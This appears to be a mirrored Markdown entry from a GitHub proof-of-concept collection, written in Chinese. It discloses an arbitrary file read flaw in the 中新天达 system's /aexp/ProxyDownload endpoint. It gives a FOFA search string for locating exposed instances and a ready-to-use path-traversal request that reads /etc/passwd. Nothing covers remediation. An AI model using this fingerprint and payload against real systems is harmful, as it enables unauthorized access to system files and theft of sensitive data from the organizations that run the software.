mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
17 lines
481 B
Markdown
17 lines
481 B
Markdown
# 中新天达系统存在任意文件读取漏洞
|
|
|
|
中新天达系统`/aexp/ProxyDownload`存在任意文件读取漏洞,可能导致敏感信息泄露、数据盗窃及其他安全风险,从而对系统和用户造成严重危害。
|
|
|
|
## fofa
|
|
|
|
```haskell
|
|
body="aexp/ValidateImage"
|
|
```
|
|
|
|
## poc
|
|
|
|
```javascript
|
|
/aexp/ProxyDownload?path=/speedec/webapps/webftp/../../../../etc/passwd
|
|
```
|
|
|
|
 |